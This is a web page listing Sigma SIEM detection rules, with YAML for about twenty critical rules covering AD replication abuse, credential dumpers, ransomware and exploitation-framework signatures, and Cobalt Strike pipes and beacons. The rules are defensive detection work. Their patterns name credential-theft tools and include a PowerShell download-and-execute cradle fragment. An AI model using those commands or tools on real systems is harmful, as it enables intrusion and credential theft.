Home/Sigma rules
Sigma

Sigma detection rules

3,132 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Each rule below converts to native syntax for Splunk, Elastic, Sentinel, and other SIEMs. Expand any rule to see its raw YAML.
Severity critical high medium low all severities

Detection rules

50 shown of 3,132
critical
AD Object WriteDAC Access
Detects WRITE_DAC access to a domain object
status test author Roberto Rodriguez @Cyb3rWard0g id 028c7842-4243-41cd-be6f-12f3cf1a26c7
view Sigma YAML 
title: AD Object WriteDAC Access
id: 028c7842-4243-41cd-be6f-12f3cf1a26c7
status: test
description: Detects WRITE_DAC access to a domain object
references:
    - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html
    - https://threathunterplaybook.com/library/windows/active_directory_replication.html
    - https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-09-12
modified: 2021-11-27
tags:
    - attack.defense-impairment
    - attack.t1222.001
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4662
        ObjectServer: 'DS'
        AccessMask: '0x40000'
        ObjectType:
            - '19195a5b-6da0-11d0-afd3-00c04fd930c9'
            - 'domainDNS'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Active Directory Replication from Non Machine Account
Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
status test author Roberto Rodriguez @Cyb3rWard0g id 17d619c1-e020-4347-957e-1d1207455c93
view Sigma YAML 
title: Active Directory Replication from Non Machine Account
id: 17d619c1-e020-4347-957e-1d1207455c93
status: test
description: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
references:
    - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html
    - https://threathunterplaybook.com/library/windows/active_directory_replication.html
    - https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-07-26
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1003.006
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4662
        AccessMask: '0x100'
        Properties|contains:
            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
            - '89e95b76-444d-4c62-991a-0facbeda640c'
    filter:
        - SubjectUserName|endswith: '$'
        - SubjectUserName|startswith: 'MSOL_' # https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/reference-connect-accounts-permissions#ad-ds-connector-account
    condition: selection and not filter
falsepositives:
    - Unknown
level: critical
critical
Antivirus Exploitation Framework Detection
Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
status stable author Florian Roth (Nextron Systems), Arnim Rupp id 238527ad-3c2c-4e4f-a1f6-92fd63adb864
view Sigma YAML 
title: Antivirus Exploitation Framework Detection
id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864
status: stable
description: |
    Detects a highly relevant Antivirus alert that reports an exploitation framework.
    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
    - https://www.nextron-systems.com/?s=antivirus
    - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797
    - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424
    - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2018-09-09
modified: 2024-11-02
tags:
    - attack.execution
    - attack.t1203
    - attack.command-and-control
    - attack.t1219.002
logsource:
    category: antivirus
detection:
    selection:
        Signature|contains:
            - 'Backdoor.Cobalt'
            - 'Brutel'
            - 'BruteR'
            - 'CobaltStr'
            - 'CobaltStrike'
            - 'COBEACON'
            - 'Cometer'
            - 'Exploit.Script.CVE'
            - 'IISExchgSpawnCMD'
            - 'Metasploit'
            - 'Meterpreter'
            - 'MeteTool'
            - 'Mpreter'
            - 'MsfShell'
            - 'PowerSploit'
            - 'Razy'
            - 'Rozena'
            - 'Sbelt'
            - 'Seatbelt'
            - 'Sliver'
            - 'Swrort'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Antivirus Password Dumper Detection
Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
status stable author Florian Roth (Nextron Systems), Arnim Rupp id 78cc2dd2-7d20-4d32-93ff-057084c38b93
view Sigma YAML 
title: Antivirus Password Dumper Detection
id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
status: stable
description: |
    Detects a highly relevant Antivirus alert that reports a password dumper.
    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
    - https://www.nextron-systems.com/?s=antivirus
    - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619
    - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2018-09-09
modified: 2024-11-02
tags:
    - attack.credential-access
    - attack.t1003
    - attack.t1558
    - attack.t1003.001
    - attack.t1003.002
logsource:
    category: antivirus
detection:
    selection:
        - Signature|startswith: 'PWS'
        - Signature|contains:
              - 'Certify'
              - 'DCSync'
              - 'DumpCreds'
              - 'DumpLsass'
              - 'DumpPert'
              - 'HTool/WCE'
              - 'Kekeo'
              - 'Lazagne'
              - 'LsassDump'
              - 'Mimikatz'
              - 'MultiDump'
              - 'Nanodump'
              - 'NativeDump'
              - 'Outflank'
              - 'PShlSpy'
              - 'PSWTool'
              - 'PWCrack'
              - 'PWDump'
              - 'PWS.'
              - 'PWSX'
              - 'pypykatz'
              - 'Rubeus'
              - 'SafetyKatz'
              - 'SecurityTool'
              - 'SharpChrome'
              - 'SharpDPAPI'
              - 'SharpDump'
              - 'SharpKatz'
              - 'SharpS.' # Sharpsploit, e.g. 530ea2ff9049f5dfdfa0a2e9c27c2e3c0685eb6cbdf85370c20a7bfae49f592d
              - 'ShpKatz'
              - 'TrickDump'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Antivirus Ransomware Detection
Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
status test author Florian Roth (Nextron Systems), Arnim Rupp id 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f
view Sigma YAML 
title: Antivirus Ransomware Detection
id: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f
status: test
description: |
    Detects a highly relevant Antivirus alert that reports ransomware.
    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
    - https://www.nextron-systems.com/?s=antivirus
    - https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916
    - https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7
    - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045
    - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d
    - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c
    - https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2022-05-12
modified: 2024-11-02
tags:
    - attack.t1486
    - attack.impact
logsource:
    category: antivirus
detection:
    selection:
        Signature|contains:
            - 'BlackWorm'
            - 'Chaos'
            - 'Cobra'
            - 'ContiCrypt'
            - 'Crypter'
            - 'CRYPTES'
            - 'Cryptor'
            - 'CylanCrypt'
            - 'DelShad'
            - 'Destructor'
            - 'Filecoder'
            - 'GandCrab'
            - 'GrandCrab'
            - 'Haperlock'
            - 'Hiddentear'
            - 'HydraCrypt'
            - 'Krypt'
            - 'Lockbit'
            - 'Locker'
            - 'Mallox'
            - 'Phobos'
            - 'Ransom'
            - 'Ryuk'
            - 'Ryzerlo'
            - 'Stopcrypt'
            - 'Tescrypt'
            - 'TeslaCrypt'
            - 'WannaCry'
            - 'Xorist'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Audit CVE Event
Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
status test author Florian Roth (Nextron Systems), Zach Mathis id 48d91a3a-2363-43ba-a456-ca71ac3da5c2
view Sigma YAML 
title: Audit CVE Event
id: 48d91a3a-2363-43ba-a456-ca71ac3da5c2
status: test
description: |
    Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.
    MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.
    Unfortunately, that is about the only instance of CVEs being written to this log.
references:
    - https://twitter.com/VM_vivisector/status/1217190929330655232
    - https://twitter.com/DidierStevens/status/1217533958096924676
    - https://twitter.com/FlemmingRiis/status/1217147415482060800
    - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed.
    - https://nullsec.us/windows-event-log-audit-cve/
author: Florian Roth (Nextron Systems), Zach Mathis
date: 2020-01-15
modified: 2022-10-22
tags:
    - attack.execution
    - attack.stealth
    - attack.t1203
    - attack.privilege-escalation
    - attack.t1068
    - attack.t1211
    - attack.credential-access
    - attack.t1212
    - attack.lateral-movement
    - attack.t1210
    - attack.impact
    - attack.t1499.004
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name:
            - 'Microsoft-Windows-Audit-CVE'
            - 'Audit-CVE'
        EventID: 1
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Bad Opsec Powershell Code Artifacts
focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
status test author ok @securonix invrep_de, oscd.community id 8d31a8ce-46b5-4dd6-bdc3-680931f1db86
view Sigma YAML 
title: Bad Opsec Powershell Code Artifacts
id: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86
related:
    - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3
      type: derived
status: test
description: |
    focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including
    Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads
    that often undergo minimal changes by attackers due to bad opsec.
references:
    - https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/
    - https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/
    - https://www.mdeditor.tw/pl/pgRt
author: 'ok @securonix invrep_de, oscd.community'
date: 2020-10-09
modified: 2022-12-25
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection_4103:
        Payload|contains:
            - '$DoIt'
            - 'harmj0y'
            - 'mattifestation'
            - '_RastaMouse'
            - 'tifkin_'
            - '0xdeadbeef'
    condition: selection_4103
falsepositives:
    - 'Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.'
level: critical
critical
Bitbucket Unauthorized Access To A Resource
Detects unauthorized access attempts to a resource.
status test author Muhammad Faisal (@faisalusuf) id 7215374a-de4f-4b33-8ba5-70804c9251d3
view Sigma YAML 
title: Bitbucket Unauthorized Access To A Resource
id: 7215374a-de4f-4b33-8ba5-70804c9251d3
status: test
description: Detects unauthorized access attempts to a resource.
references:
    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
    - attack.resource-development
    - attack.t1586
logsource:
    product: bitbucket
    service: audit
    definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
    selection:
        auditType.category: 'Security'
        auditType.action: 'Unauthorized access to a resource'
    condition: selection
falsepositives:
    - Access attempts to non-existent repositories or due to outdated plugins. Usually "Anonymous" user is reported in the "author.name" field in most cases.
level: critical
critical
Bitbucket Unauthorized Full Data Export Triggered
Detects when full data export is attempted an unauthorized user.
status test author Muhammad Faisal (@faisalusuf) id 34d81081-03c9-4a7f-91c9-5e46af625cde
view Sigma YAML 
title: Bitbucket Unauthorized Full Data Export Triggered
id: 34d81081-03c9-4a7f-91c9-5e46af625cde
status: test
description: Detects when full data export is attempted an unauthorized user.
references:
    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
    - attack.collection
    - attack.resource-development
    - attack.t1213.003
    - attack.t1586
logsource:
    product: bitbucket
    service: audit
    definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
    selection:
        auditType.category: 'Data pipeline'
        auditType.action: 'Unauthorized full data export triggered'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Certificate Request Export to Exchange Webserver
Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
status test author Max Altgelt (Nextron Systems) id b7bc7038-638b-4ffd-880c-292c692209ef
view Sigma YAML 
title: Certificate Request Export to Exchange Webserver
id: b7bc7038-638b-4ffd-880c-292c692209ef
status: test
description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
references:
    - https://twitter.com/GossiTheDog/status/1429175908905127938
author: Max Altgelt (Nextron Systems)
date: 2021-08-23
modified: 2023-01-23
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    service: msexchange-management
    product: windows
detection:
    keywords_export_command:
        '|all':
            - 'New-ExchangeCertificate'
            - ' -GenerateRequest'
            - ' -BinaryEncoded'
            - ' -RequestFile'
    keywords_export_params:
        - '\\\\localhost\\C$'
        - '\\\\127.0.0.1\\C$'
        - 'C:\\inetpub'
        - '.aspx'
    condition: keywords_export_command and keywords_export_params
falsepositives:
    - Unlikely
level: critical
critical
Cobalt Strike DNS Beaconing
Detects suspicious DNS queries known from Cobalt Strike beacons
status test author Florian Roth (Nextron Systems) id 2975af79-28c4-4d2f-a951-9095f229df29
view Sigma YAML 
title: Cobalt Strike DNS Beaconing
id: 2975af79-28c4-4d2f-a951-9095f229df29
status: test
description: Detects suspicious DNS queries known from Cobalt Strike beacons
references:
    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
author: Florian Roth (Nextron Systems)
date: 2018-05-10
modified: 2022-10-09
tags:
    - attack.command-and-control
    - attack.t1071.004
logsource:
    category: dns
detection:
    selection1:
        query|startswith:
            - 'aaa.stage.'
            - 'post.1'
    selection2:
        query|contains: '.stage.123456.'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
critical
CobaltStrike Named Pipe
Detects the creation of a named pipe as used by CobaltStrike
status test author Florian Roth (Nextron Systems), Wojciech Lesicki id d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
view Sigma YAML 
title: CobaltStrike Named Pipe
id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
related:
    - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns
      type: similar
    - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex
      type: similar
status: test
description: Detects the creation of a named pipe as used by CobaltStrike
references:
    - https://twitter.com/d4rksystem/status/1357010969264873472
    - https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/
    - https://github.com/SigmaHQ/sigma/issues/253
    - https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/
    - https://redcanary.com/threat-detection-report/threats/cobalt-strike/
author: Florian Roth (Nextron Systems), Wojciech Lesicki
date: 2021-05-25
modified: 2022-10-31
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection_MSSE:
        PipeName|contains|all:
            - '\MSSE-'
            - '-server'
    selection_postex:
        PipeName|startswith: '\postex_' # Also include the pipe "\postex_ssh_"
    selection_status:
        PipeName|startswith: '\status_'
    selection_msagent:
        PipeName|startswith: '\msagent_'
    selection_mojo:
        PipeName|startswith: '\mojo_'
    selection_interprocess:
        PipeName|startswith: '\interprocess_'
    selection_samr:
        PipeName|startswith: '\samr_'
    selection_netlogon:
        PipeName|startswith: '\netlogon_'
    selection_srvsvc:
        PipeName|startswith: '\srvsvc_'
    selection_lsarpc:
        PipeName|startswith: '\lsarpc_'
    selection_wkssvc:
        PipeName|startswith: '\wkssvc_'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
critical
CobaltStrike Named Pipe Pattern Regex
Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
status test author Florian Roth (Nextron Systems) id 0e7163d4-9e19-4fa7-9be6-000c61aad77a
view Sigma YAML 
title: CobaltStrike Named Pipe Pattern Regex
id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a
related:
    - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns
      type: similar
    - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic
      type: similar
status: test
description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
references:
    - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
    - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
author: Florian Roth (Nextron Systems)
date: 2021-07-30
modified: 2022-12-31
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        - PipeName|re: '\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}'
        - PipeName|re: '\\wkssvc_?[0-9a-f]{2}'
        - PipeName|re: '\\ntsvcs[0-9a-f]{2}'
        - PipeName|re: '\\DserNamePipe[0-9a-f]{2}'
        - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}'
        - PipeName|re: '\\mypipe-(?:f|h)[0-9a-f]{2}'
        - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2,3}'
        - PipeName|re: '\\ntsvcs_[0-9a-f]{2}'
        - PipeName|re: '\\scerpc_?[0-9a-f]{2}'
        - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}'
        - PipeName|re: '\\MsFteWds[0-9a-f]{2}'
        - PipeName|re: '\\f4c3[0-9a-f]{2}'
        - PipeName|re: '\\fullduplex_[0-9a-f]{2}'
        - PipeName|re: '\\msrpc_[0-9a-f]{4}'
        - PipeName|re: '\\win\\msrpc_[0-9a-f]{2}'
        - PipeName|re: '\\f53f[0-9a-f]{2}'
        - PipeName|re: '\\rpc_[0-9a-f]{2}'
        - PipeName|re: '\\spoolss_[0-9a-f]{2}'
        - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
CobaltStrike Service Installations - System
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
status test author Florian Roth (Nextron Systems), Wojciech Lesicki id 5a105d34-05fc-401e-8553-272b45c1522d
view Sigma YAML 
title: CobaltStrike Service Installations - System
id: 5a105d34-05fc-401e-8553-272b45c1522d
status: test
description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
references:
    - https://www.sans.org/webcasts/119395
    - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
author: Florian Roth (Nextron Systems), Wojciech Lesicki
date: 2021-05-26
modified: 2022-11-27
tags:
    - attack.persistence
    - attack.execution
    - attack.privilege-escalation
    - attack.lateral-movement
    - attack.t1021.002
    - attack.t1543.003
    - attack.t1569.002
logsource:
    product: windows
    service: system
detection:
    selection_id:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
    selection1:
        ImagePath|contains|all:
            - 'ADMIN$'
            - '.exe'
    selection2:
        ImagePath|contains|all:
            - '%COMSPEC%'
            - 'start'
            - 'powershell'
    selection3:
        ImagePath|contains: 'powershell -nop -w hidden -encodedcommand'
    selection4:
        ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:"
    condition: selection_id and (selection1 or selection2 or selection3 or selection4)
falsepositives:
    - Unknown
level: critical
critical
DiagTrackEoP Default Login Username
Detects the default "UserName" used by the DiagTrackEoP POC
status test author Nasreddine Bencherchali (Nextron Systems) id 2111118f-7e46-4fc8-974a-59fd8ec95196
view Sigma YAML 
title: DiagTrackEoP Default Login Username
id: 2111118f-7e46-4fc8-974a-59fd8ec95196
status: test
description: Detects the default "UserName" used by the DiagTrackEoP POC
references:
    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-03
tags:
    - attack.privilege-escalation
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 9
        TargetOutboundUserName: 'thisisnotvaliduser'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
DumpStack.log Defender Evasion
Detects the use of the filename DumpStack.log to evade Microsoft Defender
status test author Florian Roth (Nextron Systems) id 4f647cfa-b598-4e12-ad69-c68dd16caef8
view Sigma YAML 
title: DumpStack.log Defender Evasion
id: 4f647cfa-b598-4e12-ad69-c68dd16caef8
status: test
description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
references:
    - https://twitter.com/mrd0x/status/1479094189048713219
author: Florian Roth (Nextron Systems)
date: 2022-01-06
modified: 2022-06-17
tags:
    - attack.defense-impairment
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\DumpStack.log'
    selection_download:
        CommandLine|contains: ' -o DumpStack.log'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
critical
HackTool - BabyShark Agent Default URL Pattern
Detects Baby Shark C2 Framework default communication patterns
status test author Florian Roth (Nextron Systems) id 304810ed-8853-437f-9e36-c4975c3dfd7e
view Sigma YAML 
title: HackTool - BabyShark Agent Default URL Pattern
id: 304810ed-8853-437f-9e36-c4975c3dfd7e
status: test
description: Detects Baby Shark C2 Framework default communication patterns
references:
    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
author: Florian Roth (Nextron Systems)
date: 2021-06-09
modified: 2024-02-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-uri|contains: 'momyshark\?key='
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Credential Dumping Tools Named Pipe Created
Detects well-known credential dumping tools execution via specific named pipe creation
status test author Teymur Kheirkhabarov, oscd.community id 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
view Sigma YAML 
title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
    - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
author: Teymur Kheirkhabarov, oscd.community
date: 2019-11-01
modified: 2023-08-07
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.t1003.002
    - attack.t1003.004
    - attack.t1003.005
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\cachedump'
            - '\lsadump'
            - '\wceservicepipe'
    condition: selection
falsepositives:
    - Legitimate Administrator using tool for password recovery
level: critical
critical
HackTool - DInjector PowerShell Cradle Execution
Detects the use of the Dinject PowerShell cradle based on the specific flags
status test author Florian Roth (Nextron Systems) id d78b5d61-187d-44b6-bf02-93486a80de5a
view Sigma YAML 
title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' /am51'
            - ' /password'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - DiagTrackEoP Default Named Pipe
Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
status test author Nasreddine Bencherchali (Nextron Systems) id 1f7025a6-e747-4130-aac4-961eb47015f1
view Sigma YAML 
title: HackTool - DiagTrackEoP Default Named Pipe
id: 1f7025a6-e747-4130-aac4-961eb47015f1
status: test
description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
references:
    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-03
modified: 2023-08-07
tags:
    - attack.privilege-escalation
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains: 'thisispipe' # Based on source code
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
status test author Florian Roth (Nextron Systems) id 93d94efc-d7ad-4161-ad7d-1638c4f908d8
view Sigma YAML 
title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
    - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
      type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: 'dumpert.dmp'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Dumpert Process Dumper Execution
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
status test author Florian Roth (Nextron Systems) id 2704ab9e-afe2-4854-a3b1-0c0706d03578
view Sigma YAML 
title: HackTool - Dumpert Process Dumper Execution
id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
status: test
description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2025-01-22
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'
        - CommandLine|contains: 'Dumpert.dll'
    condition: selection
